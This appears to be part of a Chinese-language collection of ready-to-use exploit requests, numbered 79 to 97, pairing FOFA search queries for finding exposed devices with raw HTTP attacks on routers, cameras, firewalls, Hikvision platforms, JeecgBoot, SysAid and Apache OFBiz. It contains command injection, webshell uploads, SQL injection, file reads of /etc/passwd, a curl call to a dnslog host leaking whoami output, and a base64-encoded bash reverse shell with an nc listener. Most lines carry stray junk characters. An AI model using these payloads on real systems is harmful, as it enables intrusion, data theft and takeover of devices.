4 Q- z) J" ~- c* o# l" iHost: x.x.x.x
) {# V5 [  n7 ^8 |5 h, [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% z5 H3 N* X" T( ~+ u
Connection: close6 n, C8 p( x" T  ?
Content-Length: 336  S8 F' W& t! B% f' K
Accept-Encoding: gzip
& J" E" S# C$ A4 LContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l- i+ V! M! g5 u6 O. T8 {6 W

% _5 h" w# F* x2 u1 Y------YsOxWxSvj1KyZow1PTsh98fdu6l3 I" n% _! Y5 t* t/ c9 b
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"1 g! f( G9 i, e4 D* I* U
Content-Type: image/png
' ^, i0 t$ {' W5 r$ \' d6 H, p  f" |) |+ o) V2 G. Y
YsOxWxSvj1KyZow1PTsh98fdu6l0 \  A! h$ a% t; g1 u, Z2 |
------YsOxWxSvj1KyZow1PTsh98fdu6l
. |! N) w5 x+ J9 X* R. i& ^* D& TContent-Disposition: form-data; name="target"( s& ?  y8 Y3 Y

  y% i6 r1 |  T' F" s/Applications/SkillDevelopAndEHS/
1 U7 @$ {' h' s% K0 J- M' |1 i------YsOxWxSvj1KyZow1PTsh98fdu6l--
, L! e0 ], W  ]5 G1 }+ L$ s$ x
/ G7 H- R1 }# N7 U; D7 N. X# ^
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
' L& t. U! }- ]Host: x.x.x.x0 M& M' }" c$ p# A! }9 p
& e8 G/ x! b3 J* k( p
/ J; U: A* t9 B/ ~2 d
79. BYTEVALUE 百为流控路由器远程命令执行
# ]9 n( W/ z, b& x. TFOFA:BYTEVALUE 智能流控路由器7 O  [; l* }$ f9 W0 z0 {' E
GET /goform/webRead/open/?path=|id HTTP/1.1% a5 ?1 j# b8 G4 V
Host:IP- S# _& u7 I, J% u2 w8 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0# }2 ?# j2 I' [& x  B" _6 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( @2 Z/ g% C; W, h9 C! |9 d7 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 l7 h# o" o: x+ ]: sAccept-Encoding: gzip, deflate
+ Q2 H1 ^2 H. p) t6 S% ]) k8 uConnection: close5 f# ~4 F+ Z5 U9 M+ t1 C
Upgrade-Insecure-Requests: 1( _. U/ T+ S' }6 d" D9 _2 m

) f9 Z1 {2 V- e7 P1 q1 {! ~" I# L: Y
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
9 _" b6 c9 E' c+ I3 pFOFA:app="速达软件-公司产品"# i) t7 |5 Q% ^+ v1 G# s' J
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
# V) L; r  p7 U+ G# [4 e9 E# g8 eHost: x.x.x.x- K/ {+ b4 a% `* y  i3 O5 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( h; W" p( }" n+ B# p
Content-Length: 27
4 G$ W( L, {: T, ?1 v0 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  M* Q1 G5 j7 U- M, e5 O8 dAccept-Encoding: gzip, deflate$ G+ j& _% Y" Y& o9 k- Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ P- t- R5 w3 N" TConnection: close
9 }( {" z2 T+ Z/ g9 B) X1 k' fContent-Type: application/octet-stream
3 a# G3 P- B0 d9 W  ~6 cUpgrade-Insecure-Requests: 1, I: k, t. R. Y8 e. N
+ q1 i! V6 W  f  M3 E* m
<% out.print("oessqeonylzaf");%>
2 F+ M9 n) y, I8 n  E, P# H. ?1 c, m4 J% n: g) u; y9 e
" S# w' V) c8 ^; a
GET /xykqmfxpoas.jsp HTTP/1.12 k) ]. m4 s' A- J1 E& I' f9 \
Host: x.x.x.x9 M+ o; n7 r6 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 H* P* h  V+ ?/ ?3 u8 r4 n
Connection: close) t3 x* p/ D! B6 N6 E
Accept-Encoding: gzip
2 u& w/ n  C- {: X
( x3 E- h3 y& Q4 U8 k* B0 I# f0 U# Y; I4 _( k9 I' A8 P: F  z4 q
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
9 b8 R" c! Q" k- A; }5 |FOFA:app="uniview-视频监控") V# C. p7 G' ]/ I
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.14 ^, v+ _- u! N% x& n
Host: x.x.x.x4 _1 {  x6 `7 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ |' L% W* A. J- E
Connection: close" N$ a3 E; z8 {. b' E( G
Accept-Encoding: gzip9 Z$ n4 Y1 o1 g$ S+ l0 [
" S# G( ?0 @& Q

5 s( l$ C1 [7 ~- l+ f82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行3 ?6 Q6 q9 i& v7 S9 [
FOFA:app="思福迪-LOGBASE"$ H. Z% E' [2 [8 [3 }
POST /bhost/test_qrcode_b HTTP/1.1' o6 j% l' V. o/ z/ ]  ^* ~3 i
Host: BaseURL5 v" O: x% [6 r  F3 N0 W( C
User-Agent: Go-http-client/1.1: S1 s- i7 Y8 j
Content-Length: 23
* D! T, _1 t! p; j/ H) \5 u' @1 r# BAccept-Encoding: gzip# u! s8 h" k. s. B& s
Connection: close, J8 H) S8 x7 k' ]/ r/ O4 Y
Content-Type: application/x-www-form-urlencoded
9 {% U' j, }8 HReferer: BaseURL4 E8 B" ?" y& J' C& S, w$ s1 Y% i

/ _1 @! g$ b! v" F; @" G1 xz1=1&z2="|id;"&z3=bhost, ]* A0 v: O6 E7 T
7 H( a- ~+ L# O0 C% X
+ r+ m0 D& d1 D6 K! N8 c
83. JeecgBoot testConnection 远程命令执行
) b0 l8 F+ c$ ?+ E3 S6 wFOFA:title=="JeecgBoot 企业级低代码平台"0 G1 m  ?- h; d

: [% A7 Z1 z3 ]/ G# _
% z8 @- l" Y) K8 N$ N8 Z! T  jPOST /jmreport/testConnection HTTP/1.1
1 t0 c; G5 j  d9 A1 c. ~: [% _) [Host: x.x.x.x7 M, w. s$ K: o) h9 L4 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 ^( G1 Y/ p3 W2 _" ]Connection: close
9 c- y' D, x: O" k+ `7 \# F3 p+ ]Content-Length: 8881
! G  s/ I! d5 u5 q4 i  S2 yAccept-Encoding: gzip( w8 u9 E' q) V: }( O4 j
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO") K; I9 v' }! u6 G, z  {. y5 X
Content-Type: application/json: x9 T" z0 z" n$ |' o
& f' _( K3 }) m. `. L$ N
PAYLOAD
5 Y' F8 n) w6 ^3 y8 s$ p1 P( Y0 s" Q5 i
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入; ^. z; z# [& ]1 v$ d( j
FOFA:title=="JeecgBoot 企业级低代码平台"
8 g# H) B. [9 R/ [
* ?  L& |, W3 H$ l9 _8 _  ^) h' C! h2 R8 \# Q
4 q5 S! e5 |( N" B
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
3 g* H% @. r6 EHost: 192.168.40.130:8080/ ]8 b/ M" i+ Q
User-Agent: curl/7.88.1& Y$ t1 F6 B3 s
Content-Length: 156) t/ \1 U5 E) A8 {9 V
Accept: */*' u$ k- x7 ]& {8 Y
Connection: close
# j. E$ k6 e# C! D3 @Content-Type: application/json
) H+ w4 }1 l4 E4 VAccept-Encoding: gzip' s- e+ w9 d+ C. i! S

/ i* F8 m9 ]2 J$ Y6 `$ ^8 n; G* G2 D{
! {/ c' ?, w* A "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
& s' d0 [  `) V  "type": "0"
9 F: A2 g) M7 e8 D}
) u9 e2 [* o% [+ U
; j5 ^" c7 `; Z  |+ x8 Q& l# [  ~; ^# l! ~7 }$ v% C9 G
85. SysAid On-premise< 23.3.36远程代码执行
( E  i& C" k  G% r1 H% QCVE-2023-472468 N9 K8 M( y) \# c) W) F/ B
FOFA:body="sysaid-logo-dark-green.png"
7 ^& s4 \# P' t. |1 s- w1 JEXP数据包如下,注入哥斯拉马+ J7 b: X, M& K3 T2 B4 {# t. [$ ?
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.14 ?* v3 y+ l* w& x- n
Host: x.x.x.x0 L. u( i1 k+ w0 v- H# J) D  z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, q7 R9 m' e/ X4 d$ BContent-Type: application/octet-stream2 j5 a$ J  y9 J( R
Accept-Encoding: gzip+ T/ y) D4 [1 b: L- N! {- l
8 C' i8 p- i* x; s
PAYLOAD; l6 `( U( c7 u$ O
0 r/ m. p4 A1 Q7 q, \0 P$ I$ Z
回显URL:http://x.x.x.x/userfiles/index.jsp1 Y7 h& R) k2 Q# k: _4 l

" F. @8 Y( q# t3 h7 N) l9 `, z86. 日本tosei自助洗衣机RCE
6 d  n! S" H! ~; PFOFA:body="tosei_login_check.php"/ u- z; ~- u: U3 Y8 A$ o" K  ~+ M
POST /cgi-bin/network_test.php HTTP/1.1! z3 U: _% v1 K$ p3 S4 d
Host: x.x.x.x
- O/ b  v5 P9 }- U" H' i' a+ H* g* AUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+ T. k3 f: U: g1 R( u0 i( {7 S! pConnection: close
9 B' C) V. f! L$ I1 [Content-Length: 448 i! R  i& u& b
Accept: */*3 w( e# w9 X5 ^0 |2 c
Accept-Encoding: gzip) v; Z+ N6 u( _4 u
Accept-Language: en0 y# M* P. _+ B' z8 V, A* @1 w
Content-Type: application/x-www-form-urlencoded
, }$ E% S5 l% r3 R5 o; R' J5 a
  h; E: a- V; s# Ohost=%0acat${IFS}/etc/passwd%0a&command=ping
; ]' [4 }$ @3 v, q$ p( K& V. `
  W7 ~9 s$ m$ n" e$ z  W
5 D/ u/ G" M" U5 u: C87. 安恒明御安全网关aaa_local_web_preview文件上传1 P& v, P7 Q/ ~5 S: ~2 O
FOFA:title="明御安全网关"/ F6 [/ Y$ T! \& M" x. [2 W
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1" e( j; t8 h6 B! v
Host: X.X.X.X
0 ?, e  |* T/ a5 t! YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, \. c3 o9 |/ @% vConnection: close
2 J/ c8 E7 g0 n: F- \5 O& xContent-Length: 1980 G/ I5 Q& d. p# |9 a# S/ H
Accept-Encoding: gzip: n+ s% h' Q8 ~
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd) u3 _4 }. n7 B# W9 O& y
. c1 l  I3 |4 u4 l
--qqobiandqgawlxodfiisporjwravxtvd/ i/ A& v2 O0 x3 F5 D8 R! g' M, g
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
. m# e' x6 X5 z8 w& Y' x' DContent-Type: text/plain
6 t) W) \. ~9 o1 ]2 [+ B+ \$ o, L
4 ^3 W' k! v. {3 k2ZqGNnsjzzU2GBBPyd8AIA7QlDq' _0 J8 {' o0 C- D1 t
--qqobiandqgawlxodfiisporjwravxtvd--# p. j! h: E% y! e
) H9 A) G6 L- F6 q( z+ u2 |
3 [9 p! ^2 b( |1 l9 V2 |
/jfhatuwe.php0 {! ]5 M" P6 U0 ]
* i+ s! N1 E* z% K- o3 o; u
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
( r5 B0 @/ a4 j" CFOFA:title="明御安全网关"+ R& }/ e+ ~6 p. t& q
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.16 k* \- r# t/ g% U: \* q
Host: x.x.x.xx.x.x.x  d( f+ y# T; B% }2 `. `- V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ M1 ^4 f% C4 n) y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 M2 E/ K0 R  l5 ^
Accept-Encoding: gzip, deflate7 n! e6 w2 j+ \+ ~4 Z/ W% T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' `5 ^, p, e! C4 [
Connection: close
/ X: T+ i- r5 H) h6 n+ K7 a, O; H) r  w
+ g1 c$ N- |& E$ D! U/ M$ P
/astdfkhl.php
( W  Q6 x" [" q( k: K: j$ n( {7 i, n9 S) v! K" @
89. 致远互联FE协作办公平台editflow_manager存在sql注入
5 K; x4 _2 S6 E& ~FOFA:title="FE协作办公平台" || body="li_plugins_download"" ?( ~4 @6 _, R' j9 m
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
5 J: m- M/ V0 |" KHost: x.x.x.x' @) A# A. K  c* `( t- B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) Q" t* A: y  m# l7 g- f- SConnection: close
/ _" l" A" ]$ v4 K( \Content-Length: 41  x  A  P, \) m, c6 k
Content-Type: application/x-www-form-urlencoded
! {6 y- c1 L2 m4 W+ I" GAccept-Encoding: gzip
7 g( n5 T: {- K" d# s6 h8 S# c5 J9 _) v; `% @9 _# `1 L1 `
option=2&GUID=-1'+union+select+111*222--+! N$ n0 f9 Y2 N

# X9 L. R4 ~$ R, E6 G7 w6 o+ C- A. h4 x2 V$ N4 x4 r
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
" J  y5 s: k5 _) m+ GFOFA:icon_hash="-1830859634"
" E0 i. |7 F2 N% C+ L! U+ T  ZPOST /php/ping.php HTTP/1.1
. C5 P6 s; K$ C% ]6 x" tHost: x.x.x.x) n' v& u  N) ^* W4 ~/ x9 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
4 p$ A! b/ |; tContent-Length: 51& E. `" q( s7 R) s2 N( u
Accept: application/json, text/javascript, */*; q=0.01
$ Y8 q' k: W5 m6 m0 OAccept-Encoding: gzip, deflate
; _' U7 q  U; ^% m. S+ ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  }$ z8 c) ?7 J7 x# z7 f) g: S. w
Connection: close. Y$ A; e) D& _
Content-Type: application/x-www-form-urlencoded
9 E, }& `. k1 J6 t% b% E# lX-Requested-With: XMLHttpRequest
# H) K6 q8 o8 o3 _: R
- {- `5 }8 o. e2 Qjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
( {* z/ v+ }3 m$ G; z  o. c& p8 q- E2 i6 {/ w
  g: p' ?: c- J4 [& N& [
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
; \) M. y8 l8 X9 M+ YFOFA:title="综合安防管理平台"
6 @* Y' o: c, q2 R( VGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1: J" F  ?: _6 O# e' |3 c# \  X' ?0 \8 a
Host: your-ip3 T- _0 R2 ^. p5 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
) f0 d  f" K) _, d! s4 GAccept-Encoding: gzip, deflate
: E% M, o; z) \% vAccept: */*' u; j) e! N' q/ V: t3 y
Connection: keep-alive
5 K7 z+ |' }7 z$ A: P: s
; ]# A5 x% c% f( ~/ m
8 s* q+ I* C, |5 _
  }2 a- R$ t. E, O/ B92. 海康威视运行管理中心session命令执行
1 |) T. f2 R0 T) B, hFastjson命令执行
! q6 K+ L# ]. ~2 E: @hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
5 r+ g* H& K- F$ }5 k8 yPOST /center/api/session HTTP/1.1
( _( q+ M4 X; x/ d- ^Host:9 r8 |! t1 M# G' o4 N
Accept: application/json, text/plain, */*
9 D5 v) _$ [1 y8 M1 |" x, V! jAccept-Encoding: gzip, deflate
+ {5 N1 t6 {7 `7 |" e4 Q9 {/ BX-Requested-With: XMLHttpRequest
  Z. ]( ^, q9 A( dContent-Type: application/json;charset=UTF-8; z4 C( ?0 j( {4 L6 H4 k5 `1 |6 v
X-Language-Type: zh_CN% j7 `* b  ^  r2 D8 g* T
Testcmd: echo test
& d0 _+ d5 X- j% g( A" c7 x" KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
+ d  [1 o+ u4 w8 m/ q1 J" BAccept-Language: zh-CN,zh;q=0.9
8 I1 b7 t: E/ l6 d; D: W% i0 n' `Content-Length: 57788 K4 ]- k# K) D7 X  o
/ e+ Y9 @- m0 p- ], j
PAYLOAD' E) p# ]0 g) v

& I$ p  b# e2 L, D  `. c: R! R% y7 W  }& J
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传  D& ~( ^! A# q5 V  ?! ?* U
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
+ f; @- Q8 d  u2 H* ^$ F/ [POST /?g=app_av_import_save HTTP/1.1; I2 z$ N# `8 Z1 p
Host: x.x.x.x
/ F* Z1 v; t. t" y+ OContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
  ~( {7 \! f, `; lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" ?3 |7 a( b2 B- M) c3 Q
( h; E& j3 o2 i2 E% F) I8 f+ E+ d------WebKitFormBoundarykcbkgdfx
# X) d/ P7 [( r/ G+ iContent-Disposition: form-data; name="MAX_FILE_SIZE"! `7 K+ M/ @7 W3 l; i: S

: J1 U$ j' s1 G7 _10000000
  ^$ d/ K* o5 W1 F------WebKitFormBoundarykcbkgdfx9 c2 \7 f9 `" Y2 m
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
- X% G( C7 J" N  x" @. PContent-Type: text/plain
. B# a8 `, t! S/ D! y! B, s# Z9 k
- j& c1 s& _9 X, @9 ^" ]wagletqrkwrddkthtulxsqrphulnknxa. J  M- C) h' Y/ J' {+ i
------WebKitFormBoundarykcbkgdfx
; `! L: `4 K7 Z& l1 \1 e7 p  ^Content-Disposition: form-data; name="submit_post"5 _. x# I; @6 r# H! e& N

/ F/ P( a* f3 x% yobj_app_upfile' e( @( M: `8 f' G; L1 O
------WebKitFormBoundarykcbkgdfx) Y; {4 p* S6 P' \
Content-Disposition: form-data; name="__hash__"
) B. L  {% L  D$ O8 E
0 k' ]3 ?" p  G/ T% U) h0b9d6b1ab7479ab69d9f71b05e0e94452 F4 k0 C$ _* n8 b8 E5 l; t
------WebKitFormBoundarykcbkgdfx--
, @) e* E! s! I2 @( D
2 X  g; x7 ^% n4 m5 E6 N, X0 j' z) e: r. O
GET /attachements/xlskxknxa.txt HTTP/1.1, P& ]6 i/ Z7 _# J; q% U& }
Host: xx.xx.xx.xx: N4 [2 v3 x; k7 ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 ^' a# \  y! B0 ~7 u% B+ c' Y: G
1 \% [1 J1 I( V8 J1 C3 W
5 L0 W, x8 c. C  Z2 {$ H
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
- J  ?1 g6 z+ o0 V7 y, _, b/ e. mFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 m% E! W$ j* n6 _. |
POST /?g=obj_area_import_save HTTP/1.1
: a0 ~* t4 u# L) M+ T, WHost: x.x.x.x5 V1 T! E. s( Z2 K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt( b- G+ ^. C3 \/ f; W" e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 g# j* b  y* P% p: O& m

4 Y3 W$ d7 @# X' C+ s; B------WebKitFormBoundarybqvzqvmt
& I$ k. R& C& e; NContent-Disposition: form-data; name="MAX_FILE_SIZE"
" D2 t; U: j, E) v. @$ t
) z0 o1 D7 Q, z1 \3 s10000000
( u- U; Z/ ^" _------WebKitFormBoundarybqvzqvmt
0 d; p1 B2 @3 w; ]" zContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
$ z) E" k% X% s. M; ^2 FContent-Type: text/plain
' v9 I5 z* K9 n: P) o6 ^1 _" S0 |" }+ n9 c3 q
pxplitttsrjnyoafavcajwkvhxindhmu
3 b1 l) w: |% v, ?7 h# H- ]------WebKitFormBoundarybqvzqvmt) i, d4 O1 Y4 w- g& l- G# v
Content-Disposition: form-data; name="submit_post"
; p; p0 Y5 X6 s' }  E0 W, n9 x: ]
' G2 }4 ?) o* {7 C4 yobj_app_upfile9 N, o) B2 C$ C0 W6 `* J8 A
------WebKitFormBoundarybqvzqvmt. \; V3 @- \5 d( t3 ]1 o( @' T
Content-Disposition: form-data; name="__hash__"; b1 V- q$ J7 O# B7 o' K; l

7 m: ?( p2 Y6 x* L8 l) B' _0b9d6b1ab7479ab69d9f71b05e0e9445
: R" `: k. ]1 \* [/ G6 L; Q------WebKitFormBoundarybqvzqvmt--8 |' q7 q: I& I3 D6 m
3 E: N5 i6 b$ a0 g

5 i4 m& A$ K" v+ h. I0 n( w
4 g7 G- }: D5 @3 \GET /attachements/xlskxknxa.txt HTTP/1.1
- J7 t1 m0 t4 h" ~( \, c6 J" SHost: xx.xx.xx.xx
" k! y( Y* {9 MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 z3 j0 D5 k( e0 \
: {0 P7 V% {5 Y4 R- J, S2 j: N6 {
8 ~/ B( L# r2 z4 q6 W
0 W) I5 K1 y" k' O0 C  D6 g
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
% q- E2 l2 s$ E3 s( yCVE-2023-49070* @! p  z' B8 f0 {  A. z
FOFA:app="Apache_OFBiz"
& W$ _; {# E! }5 g5 _" ePOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
3 n* ~7 p% [6 d) j# B+ UHost: x.x.x.x- C! c+ Y, h0 w) b" y4 Q! O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& L- _% A# x7 @) w" [! |" [1 I) p/ iConnection: close( Z( X/ U$ a( ?: F& s- U
Content-Length: 889
, n  Z- `* ^6 h' T, S& HContent-Type: application/xml
- p. j/ O: w. L$ eAccept-Encoding: gzip7 R  f9 U/ W, s* ]- F  W
$ l. T. L4 _! T: a
<?xml version="1.0"?>/ }; E6 X1 x; k! C
<methodCall>1 Z4 k2 {4 Y. K0 R& f
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
% H8 Z0 {6 ?! w  |9 C    <params>
7 @1 N6 ?7 M# ^1 E+ O3 a      <param>
, F6 Q' F9 C1 o4 k5 p7 [      <value>6 h" g1 ~4 E' S) k9 C/ t0 t
        <struct>' D& S. F* i" c$ |* Y+ [$ k; C
       <member>
% ?1 W) E9 t, P9 T          <name>test</name>
/ X' [) z/ Z( }          <value>
/ U( P7 C+ V: x' y" r/ ^1 J0 g- R      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
' x  P1 T8 {0 r          </value>
7 n. F% j6 m* m/ e2 C+ |4 E$ Y, R+ p4 \        </member>
* {8 g' K% @' l1 Q      </struct>
- V3 ^9 w8 C0 G5 n% T! E5 N      </value>
9 ^9 h, h; Z% c2 ~6 p/ [5 w1 u    </param>
& h0 w( W+ M8 r8 x) t$ k    </params>
% [% c6 ~( |: g' w* Z  a( a  Z</methodCall>& |% ]* B3 P5 d

4 n7 X, X; m" a/ R: h. [# Z) p4 a7 \; c
用ysoserial生成payload1 A. `5 P% \' c# b% V$ y+ G; G/ ^
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"6 [, q, o& l4 ^+ c/ c# U7 z' W% _8 G
  C3 x3 D2 y8 o5 K$ ^
: S& e# x* L0 u3 s
将生成的payload替换到上面的POC
8 B4 r% X! T- O9 O0 gPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
5 e4 t& p. D. Z. F" oHost: 192.168.40.130:8443
8 m. e5 s% w; K6 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
$ M0 q) J1 Y6 Y1 G) ^. }7 m; w3 sConnection: close
& ^6 K) Q* r4 \1 i$ @3 ?' yContent-Length: 8897 b* Y/ p- i% d$ n# e
Content-Type: application/xml
* h/ G0 b1 e9 @. \* u5 d$ qAccept-Encoding: gzip
) S! R  Q/ B4 l! F( A7 E" {9 g3 U8 r2 e  `
PAYLOAD( c  ~! r# U! k# u2 Q3 D9 B) f

9 O- y- O( i. a1 m$ K5 I) k96. Apache OFBiz  18.12.11 groovy 远程代码执行
0 U- G# G9 E9 K" C7 w3 oFOFA:app="Apache_OFBiz": [5 R/ K; a1 N0 y( ?
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.12 E# n6 I8 `; I; j: H& G& i2 D  Q
Host: localhost:8443
; v; R0 t; M' mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 f2 |/ ~8 P- C: o% {, x- ^Accept: */*+ J" h: N* j+ ]; h' F! F' R3 r+ `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 s' k$ d& F# e) [  }6 v0 R3 g+ m$ y! FContent-Type: application/x-www-form-urlencoded
3 Q9 A, O+ s$ HContent-Length: 55. B* W9 Z0 {5 N. g' _5 z

0 W9 ~9 s  j2 TgroovyProgram=throw+new+Exception('id'.execute().text);( }9 a: Q$ f; x5 D

) Y( D! |9 ~6 }; P
7 Z0 q: d% h- \1 a2 z  K反弹shell
1 A) d% ~4 L/ [在kali上启动一个监听
* y& e9 G" C. Enc -lvp 77771 M$ T. T5 l9 Y( w) x) E& K7 a7 ~
2 r. X5 }  e' Z$ W
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
  ?0 Q. N- w- E2 |/ a6 m4 I" kHost: 192.168.40.130:84433 R, q0 W1 r  O. k+ P! h/ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% _6 Q/ b- c( s" p9 K8 N, y" l; m
Accept: */*+ l" ^, P" N/ R, n0 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 v- A8 R0 h5 o+ }1 Y4 RContent-Type: application/x-www-form-urlencoded& p0 S: v0 J8 o. q
Content-Length: 711 |+ m  Z0 _. {7 h8 l

. L0 U. M: i  |: n2 Q& a: CgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();6 Z: b& ~% B% _7 X! {
1 g. ]3 ^% n+ \  V- P; n5 j/ N4 d
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行9 T- D; c) k% x4 j7 Z& s" A
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
/ V0 w6 Q' r$ x4 T$ \3 sGET /passport/login/ HTTP/1.1
( s" l2 |# r8 B; x  pHost: 192.168.40.130:8085
